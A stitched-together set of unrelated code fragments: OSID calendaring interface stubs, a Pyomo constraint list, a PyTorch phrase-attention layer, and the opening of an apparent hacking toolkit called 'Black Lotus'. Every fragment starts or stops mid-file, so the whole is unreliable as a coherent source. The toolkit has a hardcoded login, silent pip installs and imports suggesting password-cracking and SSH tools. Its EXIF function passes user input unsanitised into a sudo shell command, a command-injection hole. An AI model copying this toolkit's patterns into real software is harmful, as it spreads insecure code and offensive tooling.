def use_isolated_calendar_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this calendar only.
*compliance: mandatory -- This method is must be implemented.*
"""
pass
@abc.abstractmethod
def use_active_offset_event_view(self):
"""Only active offset events are returned by methods in this session.
*compliance: mandatory -- This method is must be implemented.*
"""
pass
@abc.abstractmethod
def use_any_status_offset_event_view(self):
"""All active and inactive offset events are returned by methods in this session.
*compliance: mandatory -- This method is must be implemented.*
"""
pass
@abc.abstractmethod
def get_offset_event(self, offset_event_id):
"""Gets the ``OffsetEvent`` specified by its ``Id``.
:param offset_event_id: ``Id`` of the ``OffsetEvent``
:type offset_event_id: ``osid.id.Id``
:return: the offset event
:rtype: ``osid.calendaring.OffsetEvent``
:raise: ``NotFound`` -- ``offset_event_id`` not found
:raise: ``NullArgument`` -- ``offset_event_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method is must be implemented.*
"""
return # osid.calendaring.OffsetEvent
@abc.abstractmethod
def get_offset_events_by_ids(self, offset_event_ids):
"""Gets an ``OffsetEventList`` corresponding to the given ``IdList``.
:param offset_event_ids: the list of ``Ids`` to retrieve
:type offset_event_ids: ``osid.id.IdList``
:return: the returned ``OffsetEvent`` list
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NotFound`` -- an ``Id was`` not found
:raise: ``NullArgument`` -- ``offset_event_ids`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
@abc.abstractmethod
def get_offset_events_by_genus_type(self, offset_event_genus_type):
"""Gets an ``OffsetEventList`` corresponding to the given offset event genus ``Type`` which does not include
offset events of genus types derived from the specified ``Type``.
:param offset_event_genus_type: an offset event genus type
:type offset_event_genus_type: ``osid.type.Type``
:return: the returned ``OffsetEvent`` list
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NullArgument`` -- ``offset_event_genus_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
@abc.abstractmethod
def get_offset_events_by_parent_genus_type(self, offset_event_genus_type):
"""Gets an ``OffsetEventList`` corresponding to the given offset event genus ``Type`` and include any additional
offset event with genus types derived from the specified ``Type``.
:param offset_event_genus_type: an offset event genus type
:type offset_event_genus_type: ``osid.type.Type``
:return: the returned ``OffsetEvent`` list
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NullArgument`` -- ``offset_event_genus_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
@abc.abstractmethod
def get_offset_events_by_record_type(self, offset_eventrecord_type):
"""Gets an ``OffsetEventList`` containing the given offset event record ``Type``.
:param offset_eventrecord_type: an offset event record type
:type offset_eventrecord_type: ``osid.type.Type``
:return: the returned ``OffsetEvent`` list
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NullArgument`` -- ``offset_event_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
@abc.abstractmethod
def get_offset_events_by_event(self, event_id):
"""Gets the ``OffsetEvents`` using the given event as a start or ending offset.
:param event_id: ``Id`` of the related event
:type event_id: ``osid.id.Id``
:return: the offset events
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NullArgument`` -- ``event_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
| |
0)
m.c1516 = Constraint(expr= m.x279 >= 0)
m.c1517 = Constraint(expr= - 5*m.x152 + m.x280 >= 0)
m.c1518 = Constraint(expr= - 5*m.x153 + m.x281 >= 0)
m.c1519 = Constraint(expr= m.x282 >= 0)
m.c1520 = Constraint(expr= m.x283 >= 0)
m.c1521 = Constraint(expr= m.x284 >= 0)
m.c1522 = Constraint(expr= m.x285 >= 0)
m.c1523 = Constraint(expr= m.x286 >= 0)
m.c1524 = Constraint(expr= m.x287 >= 0)
m.c1525 = Constraint(expr= - 5*m.x160 + m.x288 >= 0)
m.c1526 = Constraint(expr= - 5*m.x161 + m.x289 >= 0)
m.c1527 = Constraint(expr= m.x290 >= 0)
m.c1528 = Constraint(expr= m.x291 >= 0)
m.c1529 = Constraint(expr= m.x292 >= 0)
m.c1530 = Constraint(expr= m.x293 >= 0)
m.c1531 = Constraint(expr= m.x294 >= 0)
m.c1532 = Constraint(expr= m.x295 >= 0)
m.c1533 = Constraint(expr= - 5*m.x168 + m.x296 >= 0)
m.c1534 = Constraint(expr= - 5*m.x169 + m.x297 >= 0)
m.c1535 = Constraint(expr= m.x298 >= 0)
m.c1536 = Constraint(expr= m.x299 >= 0)
m.c1537 = Constraint(expr= m.x300 >= 0)
m.c1538 = Constraint(expr= m.x301 >= 0)
m.c1539 = Constraint(expr= m.x302 >= 0)
m.c1540 = Constraint(expr= m.x303 >= 0)
m.c1541 = Constraint(expr= - 5*m.x176 + m.x304 >= 0)
m.c1542 = Constraint(expr= - 5*m.x177 + m.x305 >= 0)
m.c1543 = Constraint(expr= m.x306 >= 0)
m.c1544 = Constraint(expr= m.x307 >= 0)
m.c1545 = Constraint(expr= m.x308 >= 0)
m.c1546 = Constraint(expr= m.x309 >= 0)
m.c1547 = Constraint(expr= m.x310 >= 0)
m.c1548 = Constraint(expr= m.x311 >= 0)
m.c1549 = Constraint(expr= - 5*m.x184 + m.x312 >= 0)
m.c1550 = Constraint(expr= - 5*m.x185 + m.x313 >= 0)
m.c1551 = Constraint(expr= m.x314 >= 0)
m.c1552 = Constraint(expr= m.x315 >= 0)
m.c1553 = Constraint(expr= m.x316 >= 0)
m.c1554 = Constraint(expr= m.x317 >= 0)
m.c1555 = Constraint(expr= m.x318 >= 0)
m.c1556 = Constraint(expr= m.x319 >= 0)
m.c1557 = Constraint(expr= - 5*m.x192 + m.x320 >= 0)
m.c1558 = Constraint(expr= - 5*m.x193 + m.x321 >= 0)
m.c1559 = Constraint(expr= - 50*m.x130 + m.x258 <= 0)
m.c1560 = Constraint(expr= - 50*m.x131 + m.x259 <= 0)
m.c1561 = Constraint(expr= - 50*m.x132 + m.x260 <= 0)
m.c1562 = Constraint(expr= - 50*m.x133 + m.x261 <= 0)
m.c1563 = Constraint(expr= - 50*m.x134 + m.x262 <= 0)
m.c1564 = Constraint(expr= - 50*m.x135 + m.x263 <= 0)
m.c1565 = Constraint(expr= - 50*m.x136 + m.x264 <= 0)
m.c1566 = Constraint(expr= - 50*m.x137 + m.x265 <= 0)
m.c1567 = Constraint(expr= - 50*m.x138 + m.x266 <= 0)
m.c1568 = Constraint(expr= - 50*m.x139 + m.x267 <= 0)
m.c1569 = Constraint(expr= - 50*m.x140 + m.x268 <= 0)
m.c1570 = Constraint(expr= - 50*m.x141 + m.x269 <= 0)
m.c1571 = Constraint(expr= - 50*m.x142 + m.x270 <= 0)
m.c1572 = Constraint(expr= - 50*m.x143 + m.x271 <= 0)
m.c1573 = Constraint(expr= - 50*m.x144 + m.x272 <= 0)
m.c1574 = Constraint(expr= - 50*m.x145 + m.x273 <= 0)
m.c1575 = Constraint(expr= - 50*m.x146 + m.x274 <= 0)
m.c1576 = Constraint(expr= - 50*m.x147 + m.x275 <= 0)
m.c1577 = Constraint(expr= - 50*m.x148 + m.x276 <= 0)
m.c1578 = Constraint(expr= - 50*m.x149 + m.x277 <= 0)
m.c1579 = Constraint(expr= - 50*m.x150 + m.x278 <= 0)
m.c1580 = Constraint(expr= - 50*m.x151 + m.x279 <= 0)
m.c1581 = Constraint(expr= - 50*m.x152 + m.x280 <= 0)
m.c1582 = Constraint(expr= - 50*m.x153 + m.x281 <= 0)
m.c1583 = Constraint(expr= - 50*m.x154 + m.x282 <= 0)
m.c1584 = Constraint(expr= - 50*m.x155 + m.x283 <= 0)
m.c1585 = Constraint(expr= - 50*m.x156 + m.x284 <= 0)
m.c1586 = Constraint(expr= - 50*m.x157 + m.x285 <= 0)
m.c1587 = Constraint(expr= - 50*m.x158 + m.x286 <= 0)
m.c1588 = Constraint(expr= - 50*m.x159 + m.x287 <= 0)
m.c1589 = Constraint(expr= - 50*m.x160 + m.x288 <= 0)
m.c1590 = Constraint(expr= - 50*m.x161 + m.x289 <= 0)
m.c1591 = Constraint(expr= - 50*m.x162 + m.x290 <= 0)
m.c1592 = Constraint(expr= - 50*m.x163 + m.x291 <= 0)
m.c1593 = Constraint(expr= - 50*m.x164 + m.x292 <= 0)
m.c1594 = Constraint(expr= - 50*m.x165 + m.x293 <= 0)
m.c1595 = Constraint(expr= - 50*m.x166 + m.x294 <= 0)
m.c1596 = Constraint(expr= - 50*m.x167 + m.x295 <= 0)
m.c1597 = Constraint(expr= - 50*m.x168 + m.x296 <= 0)
m.c1598 = Constraint(expr= - 50*m.x169 + m.x297 <= 0)
m.c1599 = Constraint(expr= - 50*m.x170 + m.x298 <= 0)
m.c1600 = Constraint(expr= - 50*m.x171 + m.x299 <= 0)
m.c1601 = Constraint(expr= - 50*m.x172 + m.x300 <= 0)
m.c1602 = Constraint(expr= - 50*m.x173 + m.x301 <= 0)
m.c1603 = Constraint(expr= - 50*m.x174 + m.x302 <= 0)
m.c1604 = Constraint(expr= - 50*m.x175 + m.x303 <= 0)
m.c1605 = Constraint(expr= - 50*m.x176 + m.x304 <= 0)
m.c1606 = Constraint(expr= - 50*m.x177 + m.x305 <= 0)
m.c1607 = Constraint(expr= - 50*m.x178 + m.x306 <= 0)
m.c1608 = Constraint(expr= - 50*m.x179 + m.x307 <= 0)
m.c1609 = Constraint(expr= - 50*m.x180 + m.x308 <= 0)
m.c1610 = Constraint(expr= - 50*m.x181 + m.x309 <= 0)
m.c1611 = Constraint(expr= - 50*m.x182 + m.x310 <= 0)
m.c1612 = Constraint(expr= - 50*m.x183 + m.x311 <= 0)
m.c1613 = Constraint(expr= - 50*m.x184 + m.x312 <= 0)
m.c1614 = Constraint(expr= - 50*m.x185 + m.x313 <= 0)
m.c1615 = Constraint(expr= - 50*m.x186 + m.x314 <= 0)
m.c1616 = Constraint(expr= - 50*m.x187 + m.x315 <= 0)
m.c1617 = Constraint(expr= - 50*m.x188 + m.x316 <= 0)
m.c1618 = Constraint(expr= - 50*m.x189 + m.x317 <= 0)
m.c1619 = Constraint(expr= - 50*m.x190 + m.x318 <= 0)
m.c1620 = Constraint(expr= - 50*m.x191 + m.x319 <= 0)
m.c1621 = Constraint(expr= - 50*m.x192 + m.x320 <= 0)
m.c1622 = Constraint(expr= - 50*m.x193 + m.x321 <= 0)
m.c1623 = Constraint(expr= m.x136 + m.x137 + m.x144 + m.x145 + m.x152 + m.x153 + m.x160 + m.x161 + m.x168 + m.x169
+ m.x176 + m.x177 + m.x184 + m.x185 + m.x192 + m.x193 == 8)
m.c1624 = Constraint(expr= m.x264 + m.x272 + m.x280 + m.x288 + m.x296 + m.x304 + m.x312 + m.x320 >= 100)
m.c1625 = Constraint(expr= m.x265 + m.x273 + m.x281 + m.x289 + m.x297 + m.x305 + m.x313 + m.x321 >= 100)
m.c1626 = Constraint(expr= m.x264 + m.x272 + m.x280 + m.x288 + m.x296 + m.x304 + m.x312 + m.x320 <= 100)
m.c1627 = Constraint(expr= m.x265 + m.x273 + m.x281 + m.x289 + m.x297 + m.x305 + m.x313 + m.x321 <= 100)
m.c1628 = Constraint(expr= - 0.15*m.x264 + 0.1*m.x346 + 0.6*m.x347 + 0.2*m.x348 + 0.5*m.x349 >= 0)
m.c1629 = Constraint(expr= - 0.45*m.x265 + 0.1*m.x350 + 0.6*m.x351 + 0.2*m.x352 + 0.5*m.x353 >= 0)
m.c1630 = Constraint(expr= - 0.15*m.x272 + 0.1*m.x378 + 0.6*m.x379 + 0.2*m.x380 + 0.5*m.x381 >= 0)
m.c1631 = Constraint(expr= - 0.45*m.x273 + 0.1*m.x382 + 0.6*m.x383 + 0.2*m.x384 + 0.5*m.x385 >= 0)
m.c1632 = Constraint(expr= - 0.15*m.x280 + 0.1*m.x410 + 0.6*m.x411 + 0.2*m.x412 + 0.5*m.x413 >= 0)
m.c1633 = Constraint(expr= - 0.45*m.x281 + 0.1*m.x414 + 0.6*m.x415 + 0.2*m.x416 + 0.5*m.x417 >= 0)
m.c1634 = Constraint(expr= - 0.15*m.x288 + 0.1*m.x442 + 0.6*m.x443 + 0.2*m.x444 + 0.5*m.x445 >= 0)
m.c1635 = Constraint(expr= - 0.45*m.x289 + 0.1*m.x446 + 0.6*m.x447 + 0.2*m.x448 + 0.5*m.x449 >= 0)
m.c1636 = Constraint(expr= - 0.15*m.x296 + 0.1*m.x474 + 0.6*m.x475 + 0.2*m.x476 + 0.5*m.x477 >= 0)
m.c1637 = Constraint(expr= - 0.45*m.x297 + 0.1*m.x478 + 0.6*m.x479 + 0.2*m.x480 + 0.5*m.x481 >= 0)
m.c1638 = Constraint(expr= - 0.15*m.x304 + 0.1*m.x506 + 0.6*m.x507 + 0.2*m.x508 + 0.5*m.x509 >= 0)
m.c1639 = Constraint(expr= - 0.45*m.x305 + 0.1*m.x510 + 0.6*m.x511 + 0.2*m.x512 + 0.5*m.x513 >= 0)
m.c1640 = Constraint(expr= - 0.15*m.x312 + 0.1*m.x538 + 0.6*m.x539 + 0.2*m.x540 + 0.5*m.x541 >= 0)
m.c1641 = Constraint(expr= - 0.45*m.x313 + 0.1*m.x542 + 0.6*m.x543 + 0.2*m.x544 + 0.5*m.x545 >= 0)
m.c1642 = Constraint(expr= - 0.15*m.x320 + 0.1*m.x570 + 0.6*m.x571 + 0.2*m.x572 + 0.5*m.x573 >= 0)
m.c1643 = Constraint(expr= - 0.45*m.x321 + 0.1*m.x574 + 0.6*m.x575 + 0.2*m.x576 + 0.5*m.x577 >= 0)
m.c1644 = Constraint(expr= - 0.25*m.x264 + 0.1*m.x346 + 0.6*m.x347 + 0.2*m.x348 + 0.5*m.x349 <= 0)
m.c1645 = Constraint(expr= - 0.55*m.x265 + 0.1*m.x350 + 0.6*m.x351 + 0.2*m.x352 + 0.5*m.x353 <= 0)
m.c1646 = Constraint(expr= - 0.25*m.x272 + 0.1*m.x378 + 0.6*m.x379 + 0.2*m.x380 + 0.5*m.x381 <= 0)
m.c1647 = Constraint(expr= - 0.55*m.x273 + 0.1*m.x382 + 0.6*m.x383 + 0.2*m.x384 + 0.5*m.x385 <= 0)
m.c1648 = Constraint(expr= - 0.25*m.x280 + 0.1*m.x410 + 0.6*m.x411 + 0.2*m.x412 + 0.5*m.x413 <= 0)
m.c1649 = Constraint(expr= - 0.55*m.x281 + 0.1*m.x414 + 0.6*m.x415 + 0.2*m.x416 + 0.5*m.x417 <= 0)
m.c1650 = Constraint(expr= - 0.25*m.x288 + 0.1*m.x442 + 0.6*m.x443 + 0.2*m.x444 + 0.5*m.x445 <= 0)
m.c1651 = Constraint(expr= - 0.55*m.x289 + 0.1*m.x446 + 0.6*m.x447 + 0.2*m.x448 + 0.5*m.x449 <= 0)
m.c1652 = Constraint(expr= - 0.25*m.x296 + 0.1*m.x474 + 0.6*m.x475 + 0.2*m.x476 + 0.5*m.x477 <= 0)
m.c1653 = Constraint(expr= - 0.55*m.x297 + 0.1*m.x478 + 0.6*m.x479 + 0.2*m.x480 + 0.5*m.x481 <= 0)
m.c1654 = Constraint(expr= - 0.25*m.x304 + 0.1*m.x506 + 0.6*m.x507 + 0.2*m.x508 + 0.5*m.x509 <= 0)
m.c1655 = Constraint(expr= - 0.55*m.x305 + 0.1*m.x510 + 0.6*m.x511 + 0.2*m.x512 + 0.5*m.x513 <= 0)
m.c1656 = Constraint(expr= - 0.25*m.x312 + 0.1*m.x538 + 0.6*m.x539 + 0.2*m.x540 + 0.5*m.x541 <= | |
torch.arange(0., seq_length, device=device).repeat(bsz, seq_len, phrase_num, 1)
y = gauss_distribution(mus, sigmas, x) * weights
y = y.sum(dim=-2)
gauss_attention = y
return gauss_attention
def forward(
self,
query,
key: Optional[Tensor],
value: Optional[Tensor],
key_padding_mask: Optional[Tensor] = None,
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
need_weights: bool = True,
static_kv: bool = False,
attn_mask: Optional[Tensor] = None,
before_softmax: bool = False,
need_head_weights: bool = False,
phrase_info: dict = None,
need_phrase: bool = False,
) -> Tuple[Tensor, Optional[Tensor]]:
"""Input shape: Time x Batch x Channel
Args:
key_padding_mask (ByteTensor, optional): mask to exclude
keys that are pads, of shape `(batch, src_len)`, where
padding elements are indicated by 1s.
need_weights (bool, optional): return the attention weights,
averaged over heads (default: False).
attn_mask (ByteTensor, optional): typically used to
implement causal attention, where the mask prevents the
attention from looking forward in time (default: None).
before_softmax (bool, optional): return the raw attention
weights and values before the attention softmax.
need_head_weights (bool, optional): return the attention
weights for each head. Implies *need_weights*. Default:
return the average attention weights over all heads.
query: tokens(source side: seq, bsz, embed_dim)
key: phrase repr
value: tokens(source/target side)
phrase_info (dict, optional): used for phrase parsing
need_phrase (bool, False): return the phrase repr
"""
if need_head_weights:
need_weights = True
key_phrase = None
tgt_len, bsz, embed_dim = query.size()
assert embed_dim == self.embed_dim
assert list(query.size()) == [tgt_len, bsz, embed_dim]
if incremental_state is not None:
saved_state = self._get_input_buffer(incremental_state)
if saved_state is not None and "prev_key" in saved_state:
# previous time steps are cached - no need to recompute
# key and value if they are static
if static_kv:
assert self.encoder_decoder_attention and not self.self_attention
key = value = None
else:
saved_state = None
# Here in self_attention, only query is needed
# project should be applied before multiheads
if self.self_attention:
if(self.multihead_attention):
q_base = self.q_proj_base(query)
k_base = self.k_proj_base(query)
if(self.gaussian_attention):
q_gauss = self.q_proj_gauss(query)
k_gauss = self.k_proj_gauss(query)
v = self.v_proj(query)
# In encoder_decoder attention, phrase(k) and token(v) are provided by encoder
# while token(q) is provided by decoder
elif self.encoder_decoder_attention:
# Basic multihead attention's k&v are provided by encoder and k = v
if(self.multihead_attention):
q_base = self.q_proj_base(query)
if key is None:
assert value is None
k_base = v = None
else:
k_base = self.k_proj_base(key)
v = self.v_proj(key)
# Gaussian attention's key&value are provided by encoder but key!=value
# Not that there is no need to build phrase in decoder, because it is done by the encoder
if(self.gaussian_attention):
q_gauss = self.q_proj_gauss(query)
if key is None:
assert value is None
k_gauss = v = None
else:
assert key is not None
assert value is not None
k_gauss = self.k_proj_gauss(key)
v = self.v_proj(value)
else:
# Note:
# If both key and value are provided, and apply_phrase is set False,
# we supposed that key is phrase repr,
# which means no PhraseEncoder will be added here
assert key is not None and value is not None
if(self.multihead_attention):
q_base = self.q_proj_base(query)
k_base = self.k_proj_base(key)
if(self.gaussian_attention):
q_gauss = self.q_proj_gauss(query)
k_gauss = self.k_proj_gauss(key)
v = self.v_proj(value)
if(self.multihead_attention):
q_base *= self.scaling
if(self.gaussian_attention):
q_gauss *= self.scaling
if self.bias_k_base is not None:
k_base = torch.cat([k_base, self.bias_k_base.repeat(1, bsz, 1)])
if self.bias_k_gauss is not None:
k_gauss = torch.cat([k_gauss, self.bias_k_gauss.repeat(1, bsz, 1)])
if(self.bias_k_base or self.bias_k_gauss):
assert self.bias_v is not None
v = torch.cat([v, self.bias_v.repeat(1, bsz, 1)])
if attn_mask is not None:
attn_mask = torch.cat(
[attn_mask, attn_mask.new_zeros(attn_mask.size(0), 1)], dim=1
)
if key_padding_mask is not None:
key_padding_mask = torch.cat(
[
key_padding_mask,
key_padding_mask.new_zeros(
key_padding_mask.size(0), 1),
],
dim=1,
)
# embed_dim = head_dim * head_num
# q: (tgt_len, bsz, embed_dim) -> (bsz * head_num, tgt_len, head_dim)
# k: (phrase_num, bsz, embed_dim) -> (bsz * head_num, phrase_num, head_dim)
# v: (src_len, bsz, embed_dim) -> (bsz * head_num, scr_len, head_dim)
# Now, the implement suppose fixed window~
# TODO graph based function is not supported yet
if(self.multihead_attention):
q_base = (
q_base.contiguous()
.view(tgt_len, bsz * self.num_heads, self.head_dim)
.transpose(0, 1)
)
if k_base is not None:
k_base = (
k_base.contiguous()
.view(-1, bsz * self.num_heads, self.head_dim)
.transpose(0, 1)
)
if(self.gaussian_attention):
q_gauss = (
q_gauss.contiguous()
.view(tgt_len, bsz * self.num_heads, self.head_dim)
.transpose(0, 1)
)
if k_gauss is not None:
k_gauss = (
k_gauss.contiguous()
.view(-1, bsz * self.num_heads, self.head_dim)
.transpose(0, 1)
)
if(self.apply_phrase):
key_phrase, phrase_info = self.phrase_encoder(k_gauss, phrase_info)
k_gauss = key_phrase
else:
key_phrase = k_gauss
if v is not None:
v = (
v.contiguous()
.view(-1, bsz * self.num_heads, self.head_dim)
.transpose(0, 1)
)
if saved_state is not None:
# saved states are stored with shape (bsz, num_heads, seq_len, head_dim)
# From saved_state get keys
if "prev_key_base" in saved_state:
assert self.multihead_attention
_prev_key_base = saved_state["prev_key_base"]
assert _prev_key_base is not None
prev_key_base = _prev_key_base.view(
bsz * self.num_heads, -1, self.head_dim)
if static_kv:
k_base = prev_key_base
else:
assert k_base is not None
k_base = torch.cat([prev_key_base, k_base], dim=1)
if "prev_key_gauss" in saved_state:
assert self.gaussian_attention
_prev_key_gauss = saved_state["prev_key_gauss"]
assert _prev_key_gauss is not None
prev_key_gauss = _prev_key_gauss.view(
bsz * self.num_heads, -1, self.head_dim)
if static_kv:
k_gauss = prev_key_gauss
else:
assert k_gauss is not None
k_gauss = torch.cat([prev_key_gauss, k_gauss], dim=1)
# From saved_state get values
if "prev_value" in saved_state:
_prev_value = saved_state["prev_value"]
assert _prev_value is not None
prev_value = _prev_value.view(
bsz * self.num_heads, -1, self.head_dim)
if static_kv:
v = prev_value
else:
assert v is not None
v = torch.cat([prev_value, v], dim=1)
# apply saved mask
prev_key_padding_mask: Optional[Tensor] = None
if "prev_key_padding_mask" in saved_state:
prev_key_padding_mask = saved_state["prev_key_padding_mask"]
assert v is not None
assert k_base or k_gauss
key_padding_mask = MultiPhraseAttention._append_prev_key_padding_mask(
key_padding_mask=key_padding_mask,
prev_key_padding_mask=prev_key_padding_mask,
batch_size=bsz,
src_len=k_base.size(1),
static_kv=static_kv,
)
# save the newest state
if(self.multihead_attention):
saved_state["prev_key_base"] = k_base.view(
bsz, self.num_heads, -1, self.head_dim)
if(self.gaussian_attention):
saved_state["prev_key_gauss"] = k_gauss.view(
bsz, self.num_heads, -1, self.head_dim)
saved_state["prev_value"] = v.view(
bsz, self.num_heads, -1, self.head_dim)
saved_state["prev_key_padding_mask"] = key_padding_mask
# In this branch incremental_state is never None
assert incremental_state is not None
incremental_state = self._set_input_buffer(
incremental_state, saved_state)
if(self.multihead_attention):
assert k_base is not None
src_len = k_base.size(1)
else:
assert k_gauss is not None
src_len = k_gauss.size(1)
# This is part of a workaround to get around fork/join parallelism
# not supporting Optional types.
if key_padding_mask is not None and key_padding_mask.dim() == 0:
key_padding_mask = None
if key_padding_mask is not None:
assert key_padding_mask.size(0) == bsz
assert key_padding_mask.size(1) == src_len
# calc multihead attention
if(self.multihead_attention):
base_attn = torch.bmm(q_base, k_base.transpose(1, 2))
else:
base_attn = None
# calc gaussian attention
if(self.gaussian_attention):
gauss_weight = torch.bmm(q_gauss, k_gauss.transpose(1, 2))
gauss_attn = self.gauss_builder_v2(
phrase_info['fixed_mu'], phrase_info['fixed_sigma'], gauss_weight, tgt_len)
if(base_attn is None):
base_attn = torch.zeros_like(gauss_attn)
else:
gauss_attn = torch.zeros_like(base_attn)
# add attention together (maybe add after softmax is better? )
gauss_attn = gauss_attn.to(base_attn.device)
attn_weights = gauss_attn + base_attn
attn_weights = MultiPhraseAttention.apply_sparse_mask(
attn_weights, tgt_len, src_len, bsz)
assert list(attn_weights.size()) == [
bsz * self.num_heads, tgt_len, src_len]
if attn_mask is not None:
attn_mask = attn_mask.unsqueeze(0)
if self.onnx_trace:
attn_mask = attn_mask.repeat(attn_weights.size(0), 1, 1)
attn_weights += attn_mask
if key_padding_mask is not None:
# don't attend to padding symbols
attn_weights = attn_weights.view(
bsz, self.num_heads, tgt_len, src_len)
attn_weights = attn_weights.masked_fill(
key_padding_mask.unsqueeze(1).unsqueeze(
2).to(torch.bool), float("-inf")
)
attn_weights = attn_weights.view(
bsz * self.num_heads, tgt_len, src_len)
if before_softmax:
return attn_weights, v
# apply softmax and dropout
attn_weights_float = utils.softmax(
attn_weights, dim=-1, onnx_trace=self.onnx_trace
)
attn_weights = attn_weights_float.type_as(attn_weights)
attn_probs = F.dropout(
attn_weights_float.type_as(attn_weights),
p=self.dropout,
training=self.training,
)
# apply attention
assert v is not None
attn = torch.bmm(attn_probs, v)
assert list(attn.size()) == [
bsz * self.num_heads, tgt_len, self.head_dim]
if self.onnx_trace and attn.size(1) == 1:
# when ONNX tracing a single decoder step (sequence length == 1)
# the transpose is a no-op copy before view, thus unnecessary
attn = attn.contiguous().view(tgt_len, bsz, embed_dim)
else:
attn = attn.transpose(0, 1).contiguous().view(
tgt_len, bsz, embed_dim)
attn = self.out_proj(attn)
attn_weights: Optional[Tensor] = None
if need_weights:
attn_weights = attn_weights_float.view(
bsz, self.num_heads, tgt_len, src_len
).transpose(1, 0)
if not need_head_weights:
# average attention weights over heads
attn_weights = attn_weights.mean(dim=0)
if(need_phrase):
assert key_phrase is not None
return attn, attn_weights, key_phrase
return attn, attn_weights
@staticmethod
def _append_prev_key_padding_mask(
key_padding_mask: Optional[Tensor],
prev_key_padding_mask: Optional[Tensor],
batch_size: int,
src_len: int,
static_kv: bool,
) -> Optional[Tensor]:
# saved key padding masks have shape (bsz, seq_len)
if prev_key_padding_mask is not None and static_kv:
new_key_padding_mask = prev_key_padding_mask
elif prev_key_padding_mask | |
<gh_stars>1-10
#!/usr/bin/env python3
#Black Lotus v2-dev-
#Copyright of <NAME>
#----------------------------------------------------------------------------------------------------------------------
import os
from getpass import getpass
import time
import sys
def login():
os.system('cls||clear')
usr = input("\033[37m Username\033[5;37m: \033[0;31m")
if usr =="black":
pas = getpass(prompt="\033[37m Password\033[5;37m: \033[0;31m")
if pas == "black":
os.system('cls||clear')
login = False
else:
print("\033[31mPassword is invalid")
print("\033[37m ")
time.sleep(1)
os.system('cls||clear')
sys.exit()
else:
print("\033[31mUsername is false or does not exist")
print("\033[37m ")
time.sleep(1)
os.system('cls||clear')
sys.exit()
login()
#----------------------------------------------------------------------------------------------------------------------
print("\033[37mLoading \033[31mBlack Lotus \n For Better experience set terminal to fullscreen\033[37m")
#----------------------------------------------------------------------------------------------------------------------
import time
import threading
import socket
import uuid
from pexpect import pxssh
import sys
import subprocess
from datetime import datetime
try:
import phonenumbers
from phonenumbers import geocoder, carrier
except:
os.system('pip install phonenumbers')
import phonenumbers
from phonenumbers import geocoder, carrier
import glob
import paramiko
import webbrowser
from PIL import Image
from PIL.ExifTags import TAGS
import re
try:
from requests_html import HTMLSession
except:
os.system('pip install requests_html')
from requests_html import HTMLSession
import requests
from pprint import pprint
from bs4 import BeautifulSoup as bs
from bs4 import BeautifulSoup
from urllib.parse import urlparse, urljoin
import colorama
from colorama import init
init()
try:
import pikepdf
except:
os.system('pip install pikepdf')
import pikepdf
from tqdm import tqdm
import zipfile
from tkinter import *
from scapy.all import *
#----------------------------------------------------------------------------------------------------------------------
def loading():
import time
import sys
animation = ["[\033[31m### \033[37m]","[\033[31m#### \033[37m]", "[\033[31m##### \033[37m]", "[\033[31m###### \033[37m]", "[\033[31m####### \033[37m]", "[\033[31m######## \033[37m]", "[\033[31m######### \033[37m]", "[\033[31m########## \033[37m]", "[\033[31m########### \033[37m]", "[\033[31m############\033[37m]"]
for i in range(len(animation)):
time.sleep(0.2)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
print("\n")
print("\033[37m ")
loading()
#----------------------------------------------------------------------------------------------------------------------
#ESC [ 31 m # red
#ESC [ 32 m # green
#ESC [ 33 m # yellow
#ESC [ 34 m # blue
#ESC [ 35 m # magenta
#ESC [ 36 m # cyan
#ESC [ 37 m # white
#ESC [ 39 m # reset
#----------------------------------------------------------------------------------------------------------------------
def public_ip_addr():
import re
import json
from urllib.request import urlopen
url = 'http://ipinfo.io/json'
response = urlopen(url)
data = json.load(response)
ip=data['ip']
org=data['org']
city = data['city']
country=data['country']
region=data['region']
location=data['loc']
hostname=data['hostname']
print('\033[32mPublic IP Address Details\n \033[37m')
print('\033[37mIP: \033[32m', ip, '\033[37m\nRegion: \033[32m', region, '\033[37m\nCountry: \033[32m',country, '\033[37m\nCity: \033[32m',city, '\033[37m\nOrg: \033[32m', org, '\033[37m ')
print('\033[37mLocation: \033[32m', location)
print('\033[37mHostname: \033[32m', hostname)
print("\n\033[37m")
#----------------------------------------------------------------------------------------------------------------------
def host_details():
host = socket.gethostname()
ip = socket.gethostbyname(host)
time.sleep(0.2)
print("\n\033[36mHost Details")
print("\033[37m============")
print("\033[37m Host: \033[31m", host)
print("\033[37m Local IP:\033[31m ", ip)
print("\033[37m MAC: \033[31m", end="")
print (':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff)
for ele in range(0,8*6,8)][::-1]))
print("\033[37m============")
public_ip_addr()
#----------------------------------------------------------------------------------------------------------------------
def photo():
imagename = input("\033[37mEnter image path \033[31m>\033[37m ")
image = Image.open(imagename)
print(" ")
print("-------------------------")
exifdata = image.getexif()
for tag_id in exifdata:
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
if isinstance(data, bytes):
data = data.decode()
print(f"{tag:25}: {data}")
print(" ")
os.system('sudo exiftool' + imagename)
#----------------------------------------------------------------------------------------------------------------------
def phone_lookup():
